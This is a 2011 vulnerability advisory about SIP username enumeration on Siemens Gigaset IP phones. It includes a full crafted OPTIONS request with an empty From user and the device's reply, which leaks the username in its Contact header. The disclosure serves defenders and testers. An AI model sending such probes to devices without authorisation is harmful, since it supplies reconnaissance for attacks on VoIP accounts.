Siemens Gigaset ip series sip username enumeration

Author: francesco.tornieri \"At\" verona-wireless.net 
Summary: Sip responses permit user identification
Release Date: 23/08/2011
Criticality level: Low
Impact: Information leak
Device: Siemens Gigaset IP series (Tested A580IP)

Description:

I've configured my own device in this way:

------------------------
Siemens Gigaset SIP Configuration Form
------------------------
IP: 192.168.1.253
Authentication Name: 500
Authentication Password: 500
Username: 500 
Display Name: dect

Authentication Name and Username field have to be the same otherwise the device doesn't registers to the PBX. 
It's possible to enumerate SIP username through use craft OPTIONS method, if you send an OPTIONS with a craft null "From" header (ex: From: <sip:@192.168.1.253:5060>) you obtain in response a "Contact" header that contains phone's username SIP field (ex:Contact: <sip:500@192.168.1.253:5060>).

------------------------
Craft Sip OPTIONS example
------------------------

OPTIONS sip:@192.168.1.253:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
Max-Forwards: 70
From: <sip:@192.168.1.253:5060>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
To: <sip:1@192.168.1.253:5060>
Call-ID: d168fe2114a87ab560886720ab19392c
CSeq: 199 OPTIONS
User-Agent: FT
Content-Length: 0

Response:
---
Received: SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport=36675;received=192.168.1.1
From: <sip:192.168.1.253:5060>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
To: <sip:1@192.168.1.253:5060>;tag=2470224496
Call-ID: 581bac10541a39c50df52ed2d88297ff
CSeq: 199 OPTIONS
Contact: <sip:500@192.168.1.253:5060>     <----- 500 SIP Username field
...
---

Francesco Tornieri